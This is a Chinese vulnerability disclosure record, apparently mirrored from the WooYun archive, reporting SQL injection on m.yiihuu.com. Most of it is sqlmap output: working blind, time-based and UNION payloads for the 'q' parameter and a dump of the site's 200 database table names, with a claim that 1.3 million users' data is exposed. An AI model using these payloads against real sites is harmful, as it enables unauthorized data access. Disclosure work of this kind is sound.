乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-04-08: 细节已通知厂商并且等待厂商处理中 2016-04-13: 厂商已经主动忽略漏洞,细节向公众公开
RT
http://m.yiihuu.com/zyxz/?q=1
sqlmap resumed the following injection point(s) from stored session:---Parameter: q (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: q=1%' AND 8567=8567 AND '%'=' Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: q=1%' AND (SELECT * FROM (SELECT(SLEEP(5)))qAgp) AND '%'=' Type: UNION query Title: MySQL UNION query (NULL) - 10 columns Payload: q=1%' UNION ALL SELECT NULL,CONCAT(0x717a767a71,0x587a634b76514a4a6c64,0x71716b7171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#---back-end DBMS: MySQL >= 5.0.0Database: yiihuu_db[200 tables]+-------------------------+| 360_token || activity || admin || admin_role || admin_role_relative || advertisement || album || album_chapter || album_copy || album_copy_chapter || album_count || album_extend || album_project || album_rank_month || album_rank_week || album_video || ask || ask_answer || ask_content || ask_zan || attention || baidu_push || book || book_art_tag || book_article || book_article_ext || book_article_temp || book_tag || business_course || business_order || card_study || chips || chips_courses || comment || comment_att || comment_content || comment_goodlog || comment_reply || courses || courses_attachment || courses_count || courses_extend || courses_homework || courses_homework_attr || courses_homework_topic || courses_info || courses_learn_progress || courses_live || courses_live_need || courses_manage_progress || courses_notice || courses_payback || courses_plan || courses_progress || courses_push || courses_qa || courses_qa_fav || courses_repay || courses_section || courses_step || courses_step_homework || courses_student_test || courses_student_work || courses_task || courses_task_comp || courses_test_ext || courses_video || courses_video_attr || coursesapply || courseslist || download || download_class || download_count || download_ext || download_log || edu_apply || email_count || error_reason || event_0410 || event_0421 || event_0509 || event_bless || event_cj || event_gift || event_gift_list || event_jyj || event_jyj_ly || event_lhb || event_lhb_extend || event_org || event_org_votelist || event_prize || event_school_msg || event_tejia || event_vip_wjdc || event_wx_hubi || event_wx_lhb || event_wx_menucount || exp_get || exp_op || fanc || favorites || filter_keyword || help || idear || idear_class || idear_count || idear_downloadlog || idear_ext || idear_focus || idear_sign || idearset || idearset_count || image_content || image_count || index_show || mail_auth || mail_notify || member || member_bind || member_bind_token || member_extend || member_filter || member_log || member_login_record || member_message || member_other || message || message_push || meta_custom || news || news_class || news_ext || prize || prize_recode || push_action || push_content || push_msg_qq || quan || quan_ext || questions || questions_class || questions_count || questions_ext || questions_replay || questions_replay_ext || say || say_content || say_count || say_log || search_syn || search_word || send_mail || share || sign || sign_extend || sort_exp || sort_level || sort_log || sort_theme || sort_theme_2 || sort_tool || sort_tool_industry || space_focusimg || space_friendlink || space_group || space_member_info || space_org_news || space_view || study || subject || subject_column || subject_soft_content || subscribe || sucai || sucai_class || sucai_count || sucai_downloadlog || sucai_ext || sucai_focus || sucai_sign || sucaiset || sucaiset_count || sys_message || task || task_member || task_verify_ip || tbl_session || video || video_bigpic || video_content || video_count || words || words_rank_month || words_rank_week || wordsset || wordsset_count || wordsset_extend || wordsset_list || wx_keyword |+-------------------------+
130万用户信息:
危害等级:无影响厂商忽略
忽略时间:2016-04-13 22:00
漏洞Rank:15 (WooYun评价)
暂无
